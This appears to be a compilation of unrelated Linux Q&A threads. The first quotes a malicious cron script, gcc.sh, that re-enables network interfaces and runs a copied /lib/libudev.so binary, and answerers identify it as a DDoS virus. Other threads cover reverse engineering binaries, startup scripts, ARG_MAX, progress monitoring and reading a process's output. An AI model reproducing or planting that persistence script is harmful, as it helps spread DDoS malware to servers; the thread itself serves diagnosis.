I have been experiencing spikes up to 1 Gbps on my server and have been looking for viruses and malware. I found this file, gcc.sh, in /etc/cron.hourly and was wondering if anyone has seen anything like it and could offer some insight into the code. Thanks!
#!/bin/sh
PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin:/usr/X11R6/bin
for i in `cat /proc/net/dev|grep :|awk -F: {'print $1'}`; do ifconfig $i up& done
cp /lib/libudev.so /lib/libudev.so.6
/lib/libudev.so.6
Quite likely. It uses /lib/libudev.so.6 as an executable while the name implies it should be a library - try using a tool like nm or objdump to see if it's an executable. It copies from /lib/libudev.so to .so.6 - while normally the .so is a symlink to the versioned one. It also runs a for loop to bring up all network connections even if you've turned them off. It uses the name of a well-known compiler to look legit. I'd call this 99%+ likely a virus.
Found another reference to something calling itself gcc - https://superuser.com/questions/863997/ddos-virus-infection-as-a-unix-service-on-a-debian-8-vm-webserver . And yes, that's a DDoS virus on a unix system, exactly matching your problem.
Yes, it is.
Try using ps -ef | grep -i libudev.so.6 to see the processes run by the program.
I would like to view the source code for a Linux command to see what is actually going on inside each command. When I attempt to open the commands in /bin in a text/hex editor, I get a bunch of garbage. What is the proper way to view the source on these commands?
Thanks in advance,
Geoff
EDIT:
I should have been more specific. Basically I have a command set that was written by someone who I can no longer reach. I would like to see what his command was actually doing, but without a way to 'disassemble' the command, I am dead in the water. I was hoping for a way to do this within the OS.
Many of the core Linux commands are part of GNU coreutils. The source can be found online here.
The files you are opening are binary executables: the machine code the kernel loads and the CPU runs. These files are produced by a compiler that takes the source code you and I understand and turns it, via a number of stages, into this CPU-friendly format.
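For instance, the "garbage" you saw begins with the ELF magic number that marks a compiled binary. A minimal check, using /bin/cat as the example (any binary in /bin works):

```shell
# The first four bytes of a compiled Linux binary are the ELF magic:
# byte 0x7f (octal 177) followed by the letters E L F.
head -c 4 /bin/cat | od -An -c    # shows: 177 E L F
```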
You can find out the system calls that are being made using strace
strace your_command
Most likely you can download the source code with your distribution's package manager. For example, on Debian and related distros (Ubuntu included), first find which package the command belongs to:
$ dpkg -S /bin/cat
coreutils: /bin/cat
The output tells you that /bin/cat is in the coreutils package. Now you can download the source code:
apt-get source coreutils
This question is related to reverse engineering.
Some keywords are static analysis and dynamic analysis.
1. Use gdb to check whether the binary has a symbol table. (If the binary was compiled with debugging flags, you may be able to recover much of the source and skip the steps below.)
2. Observe the program's behavior with strace/ltrace.
3. Write pseudo-code with the help of objdump/IDA Pro or another disassembler.
4. Run it under gdb for dynamic analysis and correct the pseudo-code.
A normal binary can be taken back to source code this way, given the will and the time. Conversely, a binary deliberately made abnormal is not easy to handle like this, but such binaries mostly appear in CTF competitions. (This involves special techniques like strip/objcopy/packers, etc.)
You can see assembly code of /bin/cat with:
objdump -d /bin/cat
Then analyze it and see what commands can be launched.
Another approach is strings /bin/cat; it is useful for forming an initial idea before reversing further.
You can get the source code of every Linux command online anyway :D
I have the following bash script to update my website with my current IP. It works fine standalone, but when put into a startup file, it fails at startup. I'm guessing it's a sequencing thing, but I'm not sure how to fix the sequencing, and after a few hours of googling and trying everything I can think of, I'm hoping someone can lead me in the right direction! This is what I am trying to run:
#!/bin/sh
IP_ADDR=$(ifconfig eth0 | sed -rn 's/^.*inet addr:(([0-9]+\.){3}[0-9]+).*$/\1/p')
wget -q -O /dev/null http://example.com/private/RPi_IP.php?send=${IP_ADDR}
I can't figure out what to do. I even tried adding it to other startup programs, and it fails at startup there too. I'm using a Raspberry Pi. Any ideas?
Your PATH might not be what you expect; boot-time scripts typically run with a minimal one. You should fully qualify any commands that you use, especially programs that live in /sbin/,
e.g.
/sbin/ifconfig
/usr/bin/sed
/usr/bin/wget
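Applied to the script above, a sketch might look like the following. The paths are the usual Debian/Raspbian locations but are assumptions here, so confirm them on your Pi with command -v ifconfig and friends; the sed extraction is demonstrated on a captured sample line so the snippet is self-contained:

```shell
#!/bin/sh
# Sketch: the same extraction with every command fully qualified.
# A sample line stands in for live `ifconfig eth0` output.
sample="          inet addr:192.168.1.5  Bcast:192.168.1.255  Mask:255.255.255.0"
IP_ADDR=$(printf '%s\n' "$sample" | /bin/sed -rn 's/^.*inet addr:(([0-9]+\.){3}[0-9]+).*$/\1/p')
echo "$IP_ADDR"    # prints 192.168.1.5
# In the real startup script you would instead run:
#   IP_ADDR=$(/sbin/ifconfig eth0 | /bin/sed -rn 's/^.*inet addr:(([0-9]+\.){3}[0-9]+).*$/\1/p')
#   /usr/bin/wget -q -O /dev/null "http://example.com/private/RPi_IP.php?send=${IP_ADDR}"
```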
I've got a straightforward bash script generated with fwbuilder that nests several echo statements and pipes them through to iptables-restore.
We compile this way instead of just having multiple "iptables -A xxx" lines since it compiles and deploys much quicker and it also doesn't drop existing connections.
The problem is we seem to have hit the limit of allowed multiple redirects (~23'850 lines don't work, ~23'600 lines do).
Run it on kernel 2.6.18 (CentOS 5.x) and it breaks, run it on 2.6.32 (6.x) and it works like a charm.
The script essentially looks like this; it comes out as just one long line piped to the command:
(echo "1"; echo "2"; echo "3"; ... ; echo "25000") | /do/anything
So I guess the question is, is there an easy way to increase this limit without recompiling the kernel? I'd imagine it's some sort of stdin character limitation of piping. Or do I have to do an OS upgrade?
edit: Oh and would also like to add that when running on the older kernel, no errors are shown, but a segfault shows in dmesg.
The reason you're not observing the problem on 2.6.32 but are observing it on 2.6.18 is that, starting with kernel 2.6.23, the ARG_MAX limitation was removed. This is the commit for the change.
In order to find some ways to circumvent the limit, see ARG_MAX.
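To see the limit in effect on your own machine (a quick check, not a fix):

```shell
# Reports the maximum combined size of arguments + environment for exec.
# On kernels >= 2.6.23 this is derived from the stack rlimit instead of
# the old fixed compile-time constant.
getconf ARG_MAX
```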
Can you use a here-doc instead?
cat <<EOF | /do/anything
1
2
3
...
25000
EOF
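If the input really is a numeric sequence as in the example, you can also sidestep the limit entirely by generating the stream at run time instead of embedding 25,000 echo statements in the script; wc -l stands in for /do/anything here:

```shell
# Nothing in this pipeline passes through the kernel's argument-size
# limit: seq writes the numbers into the pipe as a stream.
seq 1 25000 | wc -l    # prints 25000
```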
I am currently working with a large data set where even the file-format conversion takes at least an hour per subject, and as a result I am often unsure whether my command is being executed or the program has frozen. I was wondering whether anyone has a tip on how to follow the progress of the commands/scripts I am trying to run in Linux?
Your help will be much appreciated.
In addition to @basile-starynkevitch's answer,
I have a bash script that can measure how much of a file you have processed, as a percentage.
It looks into procfs, gets the current position from the fd information (/proc/PID/fdinfo), and computes it as a percentage of the total file size.
See https://gist.github.com/azat/2830255
curl -s https://gist.github.com/azat/2830255/raw >| progress_fds.sh \
&& chmod +x progress_fds.sh
Usage:
./progress_fds.sh /path/to/file [ PID]
Can be useful to someone.
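The core of what the script does can be sketched in a few lines of shell. The sketch below demonstrates it on the current shell's own fd 3 reading a temporary file; against a real job you would substitute the target PID and the fd number found under /proc/PID/fd:

```shell
#!/bin/sh
# Sketch: read an fd's current offset from /proc/PID/fdinfo and
# compare it with the file size to get a progress percentage.
tmp=$(mktemp)
seq 1 100000 > "$tmp"                       # a file to "process"
exec 3< "$tmp"                              # open it on fd 3
dd bs=1024 count=10 <&3 > /dev/null 2>&1    # consume part of it
pos=$(awk '/^pos:/ {print $2}' /proc/$$/fdinfo/3)
size=$(wc -c < "$tmp")
echo "$((pos * 100 / size))%"               # progress so far
exec 3<&-
rm -f "$tmp"
```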
If the long-lasting command produces some output in a file foo.out, you could do watch ls -l foo.out or tail -f foo.out
You could also list /proc/$(pidof prog)/fd to find out the opened files of some prog
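For instance, using the current shell as a stand-in for prog:

```shell
# Each entry under /proc/PID/fd is a symlink to the file that
# descriptor has open; here PID is $$ (this shell itself).
ls -l /proc/$$/fd
```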
You can follow the syscalls of a program by using strace, which will enable you to follow the open calls.
You can use verbose output, but it will slow things down even more.
I guess there can't be a general answer to that; it just depends on the type of program (and doesn't even have anything to do with Linux, see the "halting problem").
If you happen to use a pipe during the conversion, I find the pv(1) tool pretty helpful. Even if pv can't know the total size of the data, it helps to see whether there is actual progress and how good the data rate is. It isn't part of most standard installations, though, and probably has to be installed explicitly.
Before flagging the question as a duplicate, please read about the various issues I encountered.
A bit of background: we are developing a C++ application running on an embedded ARM SBC using a lite variant of Debian Linux. The application starts at boot, launched by the boot script, and prints various information to stdout. What we would like is the ability to connect using SSH/Telnet and read the application's output without having to kill the process and restart it for the current bash session. I want to create a simple .sh script for non-tech-savvy people to use.
The first solution for the similar question posted here is to use gdb. First, it's not user-friendly (you need to write multiple commands manually), and, though I wonder why, it doesn't seem to output anything into the file.
The second solution, strace -ewrite -p PID, works perfectly; that's what I want. The problem is that there's a lot more information than just stdout, and it's badly formatted.
I managed to get an "acceptable" result with strace -e write=1 -s 1024 -p 20049 2>&1 | grep "write(1," but it still has the superfluous write(1, "...", 19) = 19 text. Up to this point it's simply a bit of string formatting, and I've found on multiple other pages this line, which supposedly achieves good formatting: strace -ff -e write=1,2 -s 1024 -p PID 2>&1 | grep "^ |" | cut -c11-60 | sed -e 's/ //g' | xxd -r -p
There are some things I find strange in this command (why -ff? why grep "^ |"? why use xxd there?) and it just doesn't output anything when I try it.
Unfortunately, we use an old, buggy version of busybox (1.7.1) that has problems with multiple pipes, and that bug gives me bad results. For example, if I only use grep it works, and if I only use cut it also works, but "grep "write(1," | cut -c11-60" returns nothing.
I know the real solution would simply be to update busybox and use those multiple pipes to format the string, but we can't update it since the OS distribution is already installed on thousands of boards shipped to our clients worldwide.
Anyone have a miraculous solution? Thanks
Screen can be connected to an existing process using reptyr (http://blog.nelhage.com/2011/01/reptyr-attach-a-running-process-to-a-new-terminal/), or you can use neercs (http://caca.zoy.org/wiki/neercs) which I haven't used but apparently is like screen but supports attaching to an existing process all by itself.